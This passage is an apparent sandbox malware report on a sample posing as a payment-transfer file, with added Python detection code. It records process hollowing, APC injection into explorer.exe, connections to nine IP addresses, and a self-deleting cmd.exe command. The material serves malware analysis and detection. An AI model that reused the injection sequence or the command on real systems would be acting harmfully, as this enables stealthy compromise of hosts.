          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C44120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C52ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C52AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CB4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CDB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CDB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C6927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C38A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C25210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C43A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C64A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C64A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeMemory allocated: page read and write | page guard
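The long listing above is every `mov r32, dword ptr fs:[30h]` the disassembler found in process 9 (the SysWOW64 explorer.exe), at 0x04C2xxxx to 0x04CFxxxx, which is outside the explorer image the report later shows unmapped at base 330000, so this is the injected payload's code rather than Explorer's own. For 32-bit code, fs:[30h] is the TEB's pointer to the PEB (native x64 code uses gs:[60h] instead); what matters for triage is which PEB field is read next: +0x02 BeingDebugged and +0x68 NtGlobalFlag are debugger checks, +0x0C Ldr is the start of a module-list walk used for API resolution. The two "Process token adjusted: Debug" lines are SeDebugPrivilege being enabled, and the guard-page allocation is a common trick to detect a debugger or memory scanner touching the page. The scanner below is an added example and not part of the Joe Sandbox report: it finds these loads in raw x86 bytes and classifies them by the field read immediately afterwards. The byte patterns come from the standard x86 encodings; the field table is the documented 32-bit _PEB layout; the input fragment is constructed for the demo, not bytes from this sample.

```python
import re
from typing import List, NamedTuple, Optional

# 32-bit PEB fields that anti-debug code typically reads after fetching fs:[30h]
# (offsets from the documented x86 _PEB layout).
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}

# The instruction the report lists, as x86 machine code:
#   64 A1 30 00 00 00      mov eax, dword ptr fs:[30h]   (moffs32 form)
#   64 8B /r 30 00 00 00   mov r32, dword ptr fs:[30h]   (ModR/M form, mod=00 rm=101)
REGS = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")
PEB_LOAD = re.compile(rb"\x64(?:\xA1|\x8B(?P<modrm>[\x05\x0D\x15\x1D\x25\x2D\x35\x3D]))\x30\x00\x00\x00")

class PebAccess(NamedTuple):
    offset: int           # offset of the fs:[30h] load in the scanned buffer
    register: str         # register that receives the PEB pointer
    field: Optional[str]  # PEB field dereferenced right after the load, if recognisable

def _field_read(window: bytes) -> Optional[str]:
    """Find the first [r32+disp8] read in the bytes after the PEB load:
         0F B6 <modrm> <disp8>   movzx r32, byte ptr [r32+disp8]   (BeingDebugged)
         8B    <modrm> <disp8>   mov   r32, dword ptr [r32+disp8]  (Ldr, NtGlobalFlag, ...)
         80    <modrm> <disp8>   cmp   byte ptr [r32+disp8], imm8
    mod=01 means 0x40 <= modrm <= 0x7F; rm=100 would need a SIB byte, so it is skipped."""
    for i in range(len(window) - 2):
        if window[i:i + 2] == b"\x0f\xb6" and i + 3 < len(window):
            modrm, disp = window[i + 2], window[i + 3]
        elif window[i] in (0x8B, 0x80):
            modrm, disp = window[i + 1], window[i + 2]
        else:
            continue
        if 0x40 <= modrm <= 0x7F and (modrm & 7) != 4:
            return PEB_FIELDS.get(disp, f"+0x{disp:02X}")
    return None

def scan_peb_access(code: bytes) -> List[PebAccess]:
    hits = []
    for m in PEB_LOAD.finditer(code):
        modrm = m.group("modrm")
        reg = "eax" if modrm is None else REGS[(modrm[0] >> 3) & 7]
        hits.append(PebAccess(m.start(), reg, _field_read(code[m.end():m.end() + 8])))
    return hits

def summarize(code: bytes) -> dict:
    """Count PEB loads by the field read afterwards: the view you want when a dump
    shows hundreds of fs:[30h] hits like the listing above."""
    counts: dict = {}
    for hit in scan_peb_access(code):
        key = hit.field or "unknown"
        counts[key] = counts.get(key, 0) + 1
    return counts

# Constructed 32-bit code fragment (not taken from the sample) with three PEB checks.
SAMPLE_CODE = bytes.fromhex(
    "55 8B EC"               # push ebp; mov ebp, esp
    "64 A1 30 00 00 00"      # mov eax, fs:[30h]
    "0F B6 40 02"            # movzx eax, byte ptr [eax+2]   PEB.BeingDebugged
    "85 C0 75 05"            # test eax, eax; jnz +5
    "64 8B 0D 30 00 00 00"   # mov ecx, fs:[30h]
    "8B 41 68"               # mov eax, [ecx+68h]            PEB.NtGlobalFlag
    "A9 70 00 00 00"         # test eax, 70h                 heap-flag bits set under a debugger
    "64 8B 35 30 00 00 00"   # mov esi, fs:[30h]
    "8B 76 0C"               # mov esi, [esi+0Ch]            PEB.Ldr (module list walk)
    "5D C3"                  # pop ebp; ret
)

if __name__ == "__main__":
    for hit in scan_peb_access(SAMPLE_CODE):
        print(f"{hit.offset:#06x}: mov {hit.register}, fs:[30h] -> {hit.field}")
    print(summarize(SAMPLE_CODE))
```

Run it over a dumped section of the injected region (a `.sdmp` from the report, or a `VirtualQuery`-sized read from a live process) rather than over the whole explorer.exe image, otherwise legitimate runtime code that reads the PEB for `Ldr` or `ProcessHeap` swamps the anti-debug hits. A load followed by a read at an offset the table does not know is reported as `+0xNN` so it is not silently dropped.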

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 210.152.86.132 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.52.105.123 80
          Source: C:\Windows\explorer.exeNetwork Connect: 50.116.112.43 80
          Source: C:\Windows\explorer.exeNetwork Connect: 176.74.27.137 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.199.108.153 80
          Source: C:\Windows\explorer.exeNetwork Connect: 164.155.144.220 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.27.88.111 80
          Injects a PE file into a foreign process
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeMemory written: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: 330000
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
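Read together, the evidence in this section describes two injection chains and a cleanup step. The sample spawns a second copy of itself, unmaps the explorer.exe image at base 330000, writes a buffer beginning with `4D5A` (the MZ header) at base 400000 and sets a thread context in process 3388: that is the process hollowing sequence. Separately it maps an execute/read/write section into both C:\Windows\explorer.exe and the SysWOW64 explorer.exe and queues an APC in explorer.exe, which is how the payload ends up running inside Explorer; the SysWOW64 explorer.exe then maps an RWX section into the native Explorer and sets a thread context there too. The nine port-80 connections come from C:\Windows\explorer.exe, not from the sample, and the final `cmd.exe /c del` removes the original file from the desktop, so the on-disk sample will be gone by the time anyone images the host. One caveat a practitioner should keep in mind: FormBook contacts decoy hosts alongside its real C2, so not every address in that list is infrastructure worth blocking; cross-check against the extracted configuration before acting on it. The code below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it parses evidence lines in the format shown above and applies two rules, one for network connections from processes that should not speak HTTP on their own and one that names the injection technique from the primitives each injecting process used. The `NO_HTTP_IMAGES` set and the technique labels are my own assumptions; the input lines are copied from the report (one duplicate dropped).

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple
# Evidence lines copied from the report section above (one duplicate dropped).
# The extracted text fuses the source path with the event name
# ("...explorer.exeNetwork Connect: ..."), so the parser keys on event names.
REPORT_LINES = r"""
Source: C:\Windows\explorer.exeNetwork Connect: 210.152.86.132 80
Source: C:\Windows\explorer.exeNetwork Connect: 198.52.105.123 80
Source: C:\Windows\explorer.exeNetwork Connect: 50.116.112.43 80
Source: C:\Windows\explorer.exeNetwork Connect: 176.74.27.137 80
Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exeNetwork Connect: 185.199.108.153 80
Source: C:\Windows\explorer.exeNetwork Connect: 164.155.144.220 80
Source: C:\Windows\explorer.exeNetwork Connect: 198.27.88.111 80
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeMemory written: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeThread register set: target process: 3388
Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 3388
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeThread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: 330000
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
"""
SAMPLE_EXE = r"C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe"
WOW_EXPLORER = r"C:\Windows\SysWOW64\explorer.exe"
EVENT_KINDS = ("Network Connect", "Memory written", "Section loaded", "Section unmapped",
               "Thread register set", "Thread APC queued", "Process created")
LINE_RE = re.compile(r"^Source:\s*(?P<source>.+?)(?P<kind>" + "|".join(EVENT_KINDS) + r"):\s*(?P<detail>.*)$")

class Event(NamedTuple):
    source: str   # process that performed the action
    kind: str
    detail: str

def parse_report(text: str) -> List[Event]:
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(Event(m["source"], m["kind"], m["detail"]))
    return events

# Images that should not open HTTP connections on their own (assumed list). explorer.exe
# is here because the report flags it; it does use SMB/WebDAV legitimately, so tune per estate.
NO_HTTP_IMAGES = {"explorer.exe", "lsass.exe", "winlogon.exe", "csrss.exe", "services.exe"}

def system_process_connections(events: List[Event]) -> List[Tuple[str, str, int]]:
    hits = []
    for ev in events:
        image = ev.source.rsplit("\\", 1)[-1].lower()
        if ev.kind == "Network Connect" and image in NO_HTTP_IMAGES:
            ip, port = ev.detail.split()
            hits.append((image, ip, int(port)))
    return hits

def classify_injection(events: List[Event]) -> Dict[str, List[str]]:
    """Collect injection primitives per injecting process and name the technique their
    combination implies. The report lists evidence per signature, not in time order, so this
    checks co-occurrence; on an EDR timeline also require create -> unmap -> write -> set context."""
    steps = defaultdict(set)
    for ev in events:
        if ev.kind == "Process created":
            image = ev.detail.split(".exe", 1)[0] + ".exe"          # first path token
            if image.lower() == ev.source.lower():
                steps[ev.source].add("self_spawn")
            elif image.lower().endswith("\\cmd.exe") and " del " in ev.detail:
                steps[ev.source].add("self_delete")
        elif ev.kind == "Section unmapped":
            steps[ev.source].add("unmap")
        elif ev.kind == "Memory written" and ev.detail.endswith("4D5A"):
            steps[ev.source].add("write_pe")                         # "MZ" header written into target
        elif ev.kind == "Thread register set":
            steps[ev.source].add("set_context")
        elif ev.kind == "Thread APC queued":
            steps[ev.source].add("apc")
        elif ev.kind == "Section loaded" and "execute" in ev.detail:
            steps[ev.source].add("rwx_section")
    findings = {}
    for src, s in steps.items():
        techs = []
        if {"unmap", "write_pe", "set_context"} <= s:
            techs.append("process hollowing" + (" of self-spawned child" if "self_spawn" in s else ""))
        if {"rwx_section", "apc"} <= s:
            techs.append("section mapping + APC injection")
        elif {"rwx_section", "set_context"} <= s:
            techs.append("section mapping + thread context hijack")
        if "self_delete" in s:
            techs.append("deletes original sample via cmd.exe")
        findings[src] = techs
    return findings

if __name__ == "__main__":
    evs = parse_report(REPORT_LINES)
    print("system-process connections:", system_process_connections(evs))
    for src, techs in classify_injection(evs).items():
        print(src.rsplit("\\", 1)[-1], "->", "; ".join(techs))
```

The same two rules translate directly to Sysmon data: event ID 3 (network connection) filtered on `Image` gives the first, and event IDs 8 (CreateRemoteThread), 10 (ProcessAccess with `GrantedAccess` including write and set-context rights) and 25 (ProcessTampering, which fires on image replacement) give the primitives for the second, where you can additionally enforce the order the sandbox output cannot.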
          Source: explorer.exe, 00000005.00000002.741529190.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.241586685.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.745817464.0000000003440000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp, explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmp, explorer.exe, 00000009.00000002.745817464.0000000003440000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.241586685.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.745817464.0000000003440000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmpBinary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000005.00000000.241586685.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.745817464.0000000003440000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
